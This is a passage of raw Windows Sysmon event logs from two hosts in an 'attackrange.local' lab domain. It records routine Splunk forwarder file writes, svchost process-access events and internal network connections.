Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440436Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.396{42DC5269-0255-6088-BF28-00000000BA01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440435Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.174{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440434Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.174{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291581Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:50.524{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C328F49683FA8C663F0147370321FA6,SHA256=95FBCF5E53C38A334E64F516D6ED9C28E400A38F4A69E1CEBE34141504ACCFA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440468Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:50.914{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B4F06F83C55E4F401C8863C05B19D5A,SHA256=B17C3822DEEAFC51147CF38B1BA4D3A838F0B41D3BEA819282EB0A09E9AA3F95,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440467Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.678{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62405-false10.0.1.12-8000- 10341000x8000000000000000440466Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:50.175{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440465Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:50.175{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440471Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:51.175{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440470Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:51.175{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440469Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:51.060{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B6EA7623D3A019F13C376911DFEA8F,SHA256=487FCE458F4E20F0A73863BFC7952B6AAE5A942C9BA219A4512CAB7AF920770D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291582Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:51.525{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FB77FF2CE1E2900EA77278FACA4C35,SHA256=3F16693C536BB9021DD805E4546341980BAECA0D3CF133CA1F5157972F78629A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291585Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:52.527{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47B2A428B300814D509E6AD2683B89D0,SHA256=5291A7E8088CCCA9591D37D868E2AF36CA415F45A068910DA219D241B667A0AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440475Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:52.448{42DC5269-CE99-6086-0D00-00000000BA01}9003760C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440474Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:52.288{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAF59DFE6D6EBD4FB8FC8ABCBB11205F,SHA256=A2AFE9EF4DE629BF4D334979B2F7C58448C1AEDCBC5B5A05419B4FDEC32BA2F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440473Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:52.176{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440472Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:52.176{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291584Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:52.142{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B8C0239FEA3721AC24F3EC58747ECDD,SHA256=CF1B71386A15AD8DEFB4E4035D09F6E3DE0F425081B63CCEB1E04F745BC1B7A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291583Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:52.142{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5E963380FFDB1A28FA5A399889F0296,SHA256=1D184C024200832F1F1E6CD1F30BDA1D4FEFCD9AA0E247E56D37331BFDA454A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291587Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:53.545{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF8D22D2F0D05961EB376837A94A5B6D,SHA256=3D0AFAAA26A452ACA3690898030546C192836FE80D4706E9759BDCCEDE3D988B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440479Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:53.520{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E0BC29D0D910495011CA6D0B462FB20,SHA256=27E1F310E58DF01C362A089F965B4970F64A688D59C55C5DB7932E5440A65A78,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291586Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:50.437{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50620-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000440478Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:53.177{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440477Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:53.177{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440476Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:53.004{42DC5269-CE99-6086-1000-00000000BA01}364NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D128C286994BEB01DF63B368698D73D7,SHA256=CF1D8F88139D92A4577E85A74A893E847DD34E4660E029DDD4BA7F83C36F1FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291588Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:54.564{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA6A4C95C27884344A69B3E3E656B28,SHA256=9DD5482C990F53A0DC951E0476F17AB748A225F8A8651A4CF41FB35B5DB0640B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440482Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:54.543{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB9BFC5422CF9CFBFD7FF96A0308F2A3,SHA256=E5F496C811FA5C6B2C29B86A52007AC093F85F137F536DE3371262898B5DC33C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440481Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:54.178{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440480Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:54.178{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440486Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:55.775{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B937D24AE1F14602E887C2EAEADEFA2,SHA256=828B40E8B7387301DAB798D1EE1980B4E88EE56CB58F4AEFFF9DD383CE045FBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291589Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:55.566{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=797A7430F3E9537DEE9282085CAFC70E,SHA256=6366A9C3554084C7726B60B55CFD8E5C315BFE2D8920B6FFF6103975915991FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440485Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:55.329{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40AFC76DABEA8F2D08A79B436CAABC36,SHA256=5EA7C9103382F5783CA5E22EF77A586BA6858A1676D9149934E488F33749D228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440484Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:55.179{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440483Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:55.179{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291590Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:56.568{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E72306C33E61FCC92EDEA6C70BF11F,SHA256=DDE246080F7CCEA5783412E9EED114B62C7873CC97F7AAB0C7D787F20FAFA2E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440489Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:52.555{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62406-false10.0.1.12-8000- 10341000x8000000000000000440488Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:56.180{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440487Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:56.180{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291593Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:57.652{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B577CC238165E6307A2D6C06641694D,SHA256=17B8D719BAE52583033254A0D292FBCF8643B1C3F33DACC04D7D5CCA95C3A0CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440492Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:57.181{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440491Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 